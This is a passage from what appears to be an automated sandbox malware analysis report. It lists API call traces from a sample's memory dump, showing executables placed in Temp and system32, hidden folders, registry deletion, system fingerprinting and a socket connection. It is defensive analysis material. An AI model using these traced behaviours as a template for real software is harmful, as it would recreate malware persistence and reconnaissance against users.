                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 004108E1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004108A0
                                                                                                                                                                                                                                                      • C:\Windows\system32\, xrefs: 004107CE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$File$lstrcpy$AttributesHeap$AllocateCloseCountCreateDirectoryFolderFromHandleListLocationMallocPathProcessSpecialTickWindowsWritelstrlen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 840702394-2518840955
                                                                                                                                                                                                                                                      • Opcode ID: dcca97a07330aefd62fffc674e3c1aeb84b5eb98b0194e1da4ef3635850571fd
                                                                                                                                                                                                                                                      • Instruction ID: e59ea0402cc0a97aad8de641f098a8acb5b0e4b41f94063a684b31080ab07657
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcca97a07330aefd62fffc674e3c1aeb84b5eb98b0194e1da4ef3635850571fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 885133B2C4021CBADB20EBA1DC89FDF777CAB55314F0445A7B505E2041EAB497D48FA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0044F7E0), ref: 00405B51
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00405B68
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00405B6F
                                                                                                                                                                                                                                                        • Part of subcall function 00410A33: EnterCriticalSection.KERNEL32(00459674,?,?,00000000,?,?,00405B7A), ref: 00410A40
                                                                                                                                                                                                                                                        • Part of subcall function 00410A33: LeaveCriticalSection.KERNEL32(00459674,?,?,00000000,?,?,00405B7A), ref: 00410A70
                                                                                                                                                                                                                                                      • SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BCA
                                                                                                                                                                                                                                                      • SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BEB
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 00405C17
                                                                                                                                                                                                                                                      • RegDeleteValueA.KERNEL32(?,00000000), ref: 00405C37
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00405C40
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405C70
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00700D88,?), ref: 00405CA4
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405D02
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00700D88,?), ref: 00405D36
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0044F7E0), ref: 00405D70
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$Delete$EnterLeaveWindowlstrcmpilstrlen$CloseCreateDesktopRectValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3629881134-0
                                                                                                                                                                                                                                                      • Opcode ID: 171633bfb54bb9041f885dfeee0c62b9f49d74c97cc8cf34d6678a76fe059ef7
                                                                                                                                                                                                                                                      • Instruction ID: 2034163c18fc6c54253ab763adb56740a824e02f721f4af71a6baf50f169b6c5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 171633bfb54bb9041f885dfeee0c62b9f49d74c97cc8cf34d6678a76fe059ef7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4651F676904614ABEB20BBA19C0AADB77ACEB10305F50407BF541B6181DB786EC48F2D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\,776AC310,76AF0F10,00000000), ref: 0040C6D2
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040C6E1
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 0040C70F
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Windows\system32\), ref: 0040C748
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040C751
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040C772
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0040C7AD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcpylstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 3674745152-3356367058
                                                                                                                                                                                                                                                      • Opcode ID: b6df891b65a45cc2a615300a5c9184ea6f316ab2b91bf69aa434291407f973ad
                                                                                                                                                                                                                                                      • Instruction ID: b179360706abfde640a6b66b940e8fe839b2ad012b079806e7e9c2bb175f0aee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6df891b65a45cc2a615300a5c9184ea6f316ab2b91bf69aa434291407f973ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD315072D0021DEADF15DBD4DC46AED77BCAB48305F6008ABE604B3181E7B89B859F58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,776AC310,00000000), ref: 00408D52
                                                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,776AC310,00000000), ref: 00408D63
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,776AC310,00000000), ref: 00408D76
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00408D7F
                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,776AC310,00000000), ref: 00408D89
                                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,776AC310,00000000), ref: 00408D91
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetProductInfo,?,?,?,776AC310,00000000), ref: 00408D9D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00408DA0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressHandleInfoModuleProcSystemVersion$Native
                                                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$GetProductInfo$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 3903033433-163341747
                                                                                                                                                                                                                                                      • Opcode ID: fbbee03e285ec05455dee1f19f6cdfb3ba18d411294cec618d8be033263a36fd
                                                                                                                                                                                                                                                      • Instruction ID: d88b8f0607474c3343ca8232b8e6d8559b1ef925911f9e6111a5faab946cfceb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbbee03e285ec05455dee1f19f6cdfb3ba18d411294cec618d8be033263a36fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1219171A0025CDBDB20DFA4DC44E9E7BB8EF48340F54446AF911A7281D738A94ACF69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,C:\Users\user\AppData\Local\Temp\,00000104,C:\Users\user\AppData\Local\Temp\,?,00000000,0040D80A), ref: 0040C02D
                                                                                                                                                                                                                                                        • Part of subcall function 004136FF: lstrlenA.KERNEL32(4941262305804196,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0040C034,?,00000000,0040D80A), ref: 00413708
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,-00000006,?,00000000,0040D80A), ref: 0040C042
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetCurrentProcess.KERNEL32(00000008,?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E4B
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E52
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E5C
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000007,?,00000000,0040D80A), ref: 0040C058
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0042A3B0,?,00000000,0040D80A), ref: 0040C064
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,?,00000000,0040D80A), ref: 0040C071
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,-0000000C,?,00000000,0040D80A), ref: 0040C084
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000104,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00413E75
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E81
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E88
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: CloseHandle.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000), ref: 00413F77
                                                                                                                                                                                                                                                        • Part of subcall function 00413E36: SetFileAttributesA.KERNEL32(00000000,00000006,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000), ref: 00413F82
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000007,?,?,?,?,00000000,0040D80A), ref: 0040C09A
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\,0042A3B0,?,?,?,?,00000000,0040D80A), ref: 0040C0A6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$AttributesErrorFileLast$ProcessTokenlstrcatlstrcpy$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\
                                                                                                                                                                                                                                                      • API String ID: 1705690235-91685041
                                                                                                                                                                                                                                                      • Opcode ID: a22528a4bd3f7e1b7169bd5d19fea0fd725bc73e28345ff0d74c62af98b68780
                                                                                                                                                                                                                                                      • Instruction ID: d73920bf5ce4dfd11cd3351f73f73b1dc2511ad9cee57e00e81c4fc8d553fe06
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a22528a4bd3f7e1b7169bd5d19fea0fd725bc73e28345ff0d74c62af98b68780
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE0184B3B4121073C1213B21AC8BFBF3A1D9F82726F04402AFD0595142CF5C566A46BF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00414E1A
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,76AF23A0), ref: 00414E2D
                                                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00414E3C
                                                                                                                                                                                                                                                      • connect.WS2_32(00000000,00000002,00000010), ref: 00414E53
                                                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,00000000), ref: 00414E62
                                                                                                                                                                                                                                                      • select.WS2_32(00000000,00000000,?,?,?), ref: 00414EA6
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00414EB8
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,76AF23A0), ref: 00414ECA
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00414EE1
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00414EE7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ioctlsocket$ErrorLastclosesocketconnecthtonsselectsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2173793709-0
                                                                                                                                                                                                                                                      • Opcode ID: 7c2a54aeaa611af5f0956abcd23816055dea6c1293f3ca778e40e3a7da28d482
                                                                                                                                                                                                                                                      • Instruction ID: e0b37a306a2363686957244b9fcd8f3cc0c7b7d42db451f1a47bf8cbf8c9e55f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c2a54aeaa611af5f0956abcd23816055dea6c1293f3ca778e40e3a7da28d482
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1212A75900218ABDB11DFA59C489EFBBBCFF88311F40016AF915E2251DB349E418FA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000), ref: 0040C37A
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040C381
                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000002,?,00000400,?,C:\Users\user\AppData\Local\Temp\), ref: 0040C3A8
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040C3B3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040C392
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                      • API String ID: 215268677-787714339
                                                                                                                                                                                                                                                      • Opcode ID: 3fc46e723eba71a1b8dee2f8b2f347e21d2e4dbc9b647d4307064d127fe98ce9
                                                                                                                                                                                                                                                      • Instruction ID: f3f63443dbc0749890ce36748c36b560e41776e2a16b7f1285e76c09dac5efdf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fc46e723eba71a1b8dee2f8b2f347e21d2e4dbc9b647d4307064d127fe98ce9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B52160B2D00219FBDF119FA49C85AEEBB79BB14301F4081BAEA01B3191DB345A45DF69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 0040C0F4
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(4941262305804196,?), ref: 0040C104
                                                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32(0040DB1D,00000000,00000000,00000063,00000000,00000000,00000000,00000000), ref: 0040C136
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(4941262305804196,?), ref: 0040C152
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
